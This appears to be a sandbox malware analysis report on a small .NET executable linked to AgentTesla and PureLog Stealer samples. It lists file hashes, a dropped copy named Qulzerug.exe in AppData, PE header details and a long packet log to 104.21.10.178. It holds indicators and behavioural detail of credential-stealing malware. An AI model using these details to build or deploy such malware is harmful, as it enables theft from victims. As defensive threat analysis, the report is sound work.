	9691e6dc404680cc6648726c8d124a6d4fc637bb6b4a092661308012438623b2_dump.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.10.178
	0VcrCVxnMP.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.10.178
	E48ALuMJ3m.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.10.178
	MzjwuZnJF0.exe	Get hash	malicious	GuLoader	Browse	104.21.10.178

Process:	C:\Users\user\Desktop\6Ek4nfs2y1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1242
Entropy (8bit):	5.363036002058323
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeRE4Kx1qE4j:MxHKlYHKh3owH8tHo6hAHKzeRHKx1qHj
MD5:	F1F711CFAECF73CB41019220224BA3D7
SHA1:	3FBBB184F8CB609B0854E6966021CF94CD684C8A
SHA-256:	B8374EA1B272A4A1D9B698BB7E4589191563DE7AEB03AB4B1BD56A09A5F5C5B1
SHA-512:	CE6358F1D7E440C0873DFD65C9DC14804749CA41DB3582A59314C01FF10CD6A037A720777D6C14EC454EED400B2DB52CFBFC3F1954C16BFF207F76E9A4847ADF
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Qulzerug.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Qulzerug.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1242
Entropy (8bit):	5.363036002058323
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeRE4Kx1qE4j:MxHKlYHKh3owH8tHo6hAHKzeRHKx1qHj
MD5:	F1F711CFAECF73CB41019220224BA3D7
SHA1:	3FBBB184F8CB609B0854E6966021CF94CD684C8A
SHA-256:	B8374EA1B272A4A1D9B698BB7E4589191563DE7AEB03AB4B1BD56A09A5F5C5B1
SHA-512:	CE6358F1D7E440C0873DFD65C9DC14804749CA41DB3582A59314C01FF10CD6A037A720777D6C14EC454EED400B2DB52CFBFC3F1954C16BFF207F76E9A4847ADF
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X

C:\Users\user\AppData\Roaming\Qulzerug.exe

Download File

Process:	C:\Users\user\Desktop\6Ek4nfs2y1.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.073591133484043
Encrypted:	false
SSDEEP:	192:7/4Pvs83Kt8WbtgD+RWok9Ztk/PSLJNjj5NBCST5:r2s83Kt86OgWo0bqqLJZjUST
MD5:	21CCB2CD9A4FBC259AB1110BC687B960
SHA1:	10D68517383A76DD23E172C1F02A74CADF104B34
SHA-256:	C2D87B5B3C906A6725F420EE3E5CB28A81BCC756B1935D6875578BBC73978687
SHA-512:	9954846094F6326E8627D19A11522E745622A4BD1CF52C9D9230D10657252CD65E199075B6CCCA24D082A55BAC7F8850169917ED45DDF127AE854137BC65B0BC
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n.{f.............................;... ...@....@.. ....................................`..................................;..J....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................;......H........(...............................................................0..s.......~....u....+@+E.+E+)+D+E.....+A+B+Cr...p+C,..-.........%,.X.....,.i2..-..,.o....+..+..+..+..+..+..+.o....+.o....+...0...........9....8.....9....&.r?..p(....rq..p(....o.....s........s.....+)+.+0+1+3.+7+9.io......o.....-.....,..,..;(....+...+..+...+.o....+...+.o....+..,..-..o......,..o.......s....8\....8]............<.O.....................!...+.~....u....r...p+.+.+......(....+.( ...+.(...++.

C:\Users\user\AppData\Roaming\Qulzerug.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\6Ek4nfs2y1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.073591133484043
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	6Ek4nfs2y1.exe
File size:	9'728 bytes
MD5:	21ccb2cd9a4fbc259ab1110bc687b960
SHA1:	10d68517383a76dd23e172c1f02a74cadf104b34
SHA256:	c2d87b5b3c906a6725f420ee3e5cb28a81bcc756b1935d6875578bbc73978687
SHA512:	9954846094f6326e8627d19a11522e745622a4bd1cf52c9d9230d10657252cd65e199075b6ccca24d082a55bac7f8850169917ed45ddf127ae854137bc65b0bc
SSDEEP:	192:7/4Pvs83Kt8WbtgD+RWok9Ztk/PSLJNjj5NBCST5:r2s83Kt86OgWo0bqqLJZjUST
TLSH:	8C12D5049FE94A37E2BB4BBA6CB662405335F3016E77C74E1484110B9FAB7E54E23B61
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n.{f.............................;... ...@....@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x403bea
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x667BFA6E [Wed Jun 26 11:24:30 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3ba0	0x4a	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x58e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1bf0	0x1c00	100ddeb1891bbc9af71233f1f779ade4	False	0.5604073660714286	data	5.537263467059152	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x58e	0x600	3b025322b4e60eb3a6b49a6150939b3b	False	0.4166666666666667	data	4.082213589688012	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6000	0xc	0x200	e3b03db2724ee76f001684a75b2dc4b8	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x405c	0x30c	data			0.4256410256410256
RT_MANIFEST	0x43a4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2024 16:16:56.050921917 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:56.050959110 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:56.051047087 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:56.103478909 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:56.103501081 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:56.589380980 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:56.589550018 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:56.617718935 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:56.617743969 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:56.618134975 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:56.665559053 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:56.666393995 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:56.712508917 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.258688927 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.258737087 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.258765936 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.258800983 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.258800030 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.258816004 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.258853912 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.306632996 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.306655884 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.349201918 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.349580050 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.349592924 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.399900913 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.442419052 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.442498922 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.442528009 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.442574024 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.442585945 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.442642927 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.442804098 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.443094969 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.443128109 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.443157911 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.443162918 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.443176031 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.443236113 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.444015026 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.444053888 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.444088936 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.444128990 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.444328070 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.444329023 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.444336891 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.444427013 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.444945097 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.445008039 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.445071936 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.445079088 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.493741035 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.493752956 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.540883064 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.556298971 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.556366920 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.556396961 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.556427002 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.556462049 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.556472063 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.556472063 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.556493044 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.556587934 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.556767941 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.556797981 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.556811094 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.556811094 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.556821108 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.556852102 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.556898117 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.556905985 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.556966066 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.557539940 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.557775021 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.557811975 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.557979107 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.557990074 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.558068991 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.558393955 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.558456898 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.558496952 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.558585882 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.558866024 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.558872938 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.558938980 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.559325933 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.559391975 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.559441090 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.559523106 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.560221910 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.560456038 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.571630001 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.571818113 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.646369934 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.646423101 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.646523952 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.646523952 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.646538019 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.696909904 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.699081898 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.699096918 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.699256897 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.699296951 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.699306965 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.699311018 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.699311018 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.699322939 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.699435949 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.699475050 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.699543953 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.699549913 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.699589014 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.701420069 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.701524019 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.701564074 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.701627016 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.701661110 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.701661110 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.701675892 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.701773882 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.701813936 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.701829910 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.701999903 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.702213049 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.702261925 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.702369928 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.702405930 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.702424049 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.702439070 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.702553988 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.702585936 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.702786922 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.702792883 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.702867031 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.703761101 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.703799009 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.703830004 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.703861952 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.703861952 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.703870058 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.703917027 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.703989029 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.704025030 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.704041958 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.704129934 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.704145908 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.704193115 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.704356909 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.704416990 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.737071991 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.737119913 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.737195015 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.737215042 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.737574100 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.789391041 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.789463997 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.789485931 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.789495945 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.789509058 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.789642096 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.789642096 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.790596008 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.790662050 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.790682077 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.790812016 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.845136881 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.845189095 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.845349073 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.845369101 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.845505953 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.845526934 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.845535040 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.845552921 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.845655918 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.845655918 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.845982075 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:57.846034050 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:57.846050978 CEST	443	49704	104.21.10.178	192.168.2.10
